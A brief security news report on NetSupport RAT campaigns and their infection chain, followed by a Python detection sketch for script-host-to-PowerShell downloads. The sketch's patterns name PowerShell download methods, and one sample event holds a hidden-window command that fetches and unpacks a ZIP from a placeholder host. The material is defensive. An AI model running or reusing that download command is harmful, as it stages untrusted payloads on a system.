Surge in NetSupport RAT Malware Cases

Threat actors are targeting the education, government, and business services sectors with NetSupport RAT, a remote access trojan. The malware is delivered through fraudulent updates, drive-by downloads, malware loaders (such as GHOSTPULSE), and various forms of phishing campaigns.

VMware Carbon Black researchers have reported detecting at least 15 new infections related to NetSupport RAT in the last few weeks. The cybersecurity firm has also detailed how NetSupport Manager, which originally served as a legitimate remote administration tool for technical assistance and support, has been misappropriated by malicious actors for their own advantage.

In August 2022, Sucuri revealed a campaign in which compromised WordPress sites were being used to display fraudulent Cloudflare DDoS protection pages that led to the distribution of NetSupport RAT. The use of bogus web browser updates is a tactic often associated with the deployment of a JavaScript-based downloader malware known as SocGholish (aka FakeUpdates), which has also been observed propagating a loader malware codenamed BLISTER.

The JavaScript payload subsequently invokes PowerShell to connect to a remote server and retrieve a ZIP archive file containing NetSupport RAT that, upon installation, beacons out to a command-and-control (C2) server. Once installed on a victim’s device, NetSupport is able to monitor behavior, transfer files, manipulate computer settings, and move to other devices within the network.
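A detection sketch for the chain described above (script host runs the JavaScript, PowerShell fetches a ZIP), added here as an example and not taken from the vendors' reports. The event field names, the script-host list and the command-line hints are assumptions, and the sample events are constructed.

```python
import re

# Assumption: the JavaScript downloader runs under a Windows script host.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Assumed command-line hints: remote fetch, ZIP handling, encoded command.
HINTS = [
    ("remote download", re.compile(
        r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|"
        r"start-bitstransfer|net\.webclient", re.I)),
    ("ZIP archive handling", re.compile(r"\.zip\b|expand-archive", re.I)),
    ("encoded command", re.compile(r"\s-e(c|n\w*)?\s", re.I)),
]

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def match_reasons(ev):
    """Reasons a process-creation event fits script host -> PowerShell -> ZIP."""
    if (basename(ev["parent_image"]) not in SCRIPT_HOSTS
            or basename(ev["image"]) not in POWERSHELL):
        return []
    reasons = ["script host spawned PowerShell"]
    return reasons + [n for n, rx in HINTS if rx.search(ev["command_line"])]

def detect(events, min_reasons=2):
    """Return (host, reasons) for events with at least min_reasons matches."""
    hits = [(ev["host"], match_reasons(ev)) for ev in events]
    return [(h, r) for h, r in hits if len(r) >= min_reasons]

# Constructed sample events (hosts, paths and URL are placeholders).
SAMPLE_EVENTS = [
    {"host": "WS-01", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -w hidden -c "iwr https://files.example.invalid/u.zip '
                     r'-OutFile $env:APPDATA\u.zip; Expand-Archive $env:APPDATA\u.zip"'},
    {"host": "WS-02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-ChildItem"},
    {"host": "WS-03", "parent_image": r"C:\Windows\System32\cscript.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": "pwsh.exe -NoProfile -File C:\\Scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for host, reasons in detect(SAMPLE_EVENTS):
        print(host, "->", ", ".join(reasons))
```

The `min_reasons` threshold keeps a script host that launches an ordinary PowerShell script (WS-03) out of the results; lower it to 1 to review every script-host-to-PowerShell launch.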
